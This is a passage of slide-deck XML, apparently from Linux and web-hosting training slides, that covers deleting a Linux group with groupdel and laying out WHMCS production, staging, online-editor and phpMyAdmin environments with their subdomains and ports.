              <a:t>     https://editor.vishalmahawar.shop (8079)</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:solidFill>
                <a:srgbClr val="6AA84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00"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1588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How to delete a linux group?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4020">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550" name="Google Shape;550;p100"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="855925" y="2329100"/>
            <a:ext cx="7213500" cy="10794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b="1" lang="en" sz="4600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="4600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>roupdel  &lt;groupName&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4900">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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7" name="Shape 4827"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4828" name="Google Shape;4828;p784"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379275" y="324000"/>
            <a:ext cx="7913100" cy="70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accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Directory Structure</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4829" name="Google Shape;4829;p784"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="474800" y="1031400"/>
            <a:ext cx="8302800" cy="4007700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-425450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Production (Customer/Client)</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	https://prod.vishalmahawar.shop</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-425450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Staging  (Developer)</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-425450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3100"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://staging.vishalmahawar.shop</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-425450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3100"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Online Editor</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-425450" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3100"/>
              <a:buAutoNum type="romanLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>editor.vishalmahawar.shop</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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3" name="Shape 4833"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4834" name="Google Shape;4834;p785"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379275" y="324000"/>
            <a:ext cx="8398200" cy="70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chemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to create whmcs staging and production environment ?</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4835" name="Google Shape;4835;p785"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="474800" y="1031400"/>
            <a:ext cx="8302800" cy="2733900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-425450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Production (Customer/Client)</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-425450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Staging  (Developer)</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-425450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3100"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Online Editor</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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9" name="Shape 4839"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4840" name="Google Shape;4840;p786"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379275" y="324000"/>
            <a:ext cx="7913100" cy="70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Directory Structure</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3200">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4841" name="Google Shape;4841;p786"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="474800" y="1031400"/>
            <a:ext cx="8302800" cy="4112100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-425450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Production (Customer/Client)</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	whmcs_production/index.html (8080)</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-425450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Staging  (Developer)</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-425450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3100"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>whmcs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>_staging/index.html (8081)</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-425450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3100"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Online Editor</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     https://editor2.vishalmahawar.shop (8082)</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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5" name="Shape 4845"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4846" name="Google Shape;4846;p787"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379275" y="324000"/>
            <a:ext cx="7913100" cy="70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Directory Structure</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3200">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4847" name="Google Shape;4847;p787"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="474800" y="1031400"/>
            <a:ext cx="8302800" cy="41121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6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2600"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Production (Customer/Client)</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	whmcs_production/index.html (8080)</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-393700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2600"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Staging  (Developer)</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-393700" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2600"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>whmcs_staging/index.html (8081)</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-393700" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2600"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Online Editor</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     https://editor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vishalmahawar.shop (8082)</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    Phpmyadmin (8079)  pma</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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1" name="Shape 4851"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4852" name="Google Shape;4852;p788"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379275" y="324000"/>
            <a:ext cx="7913100" cy="70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Directory Structure</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3200">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4853" name="Google Shape;4853;p788"/>
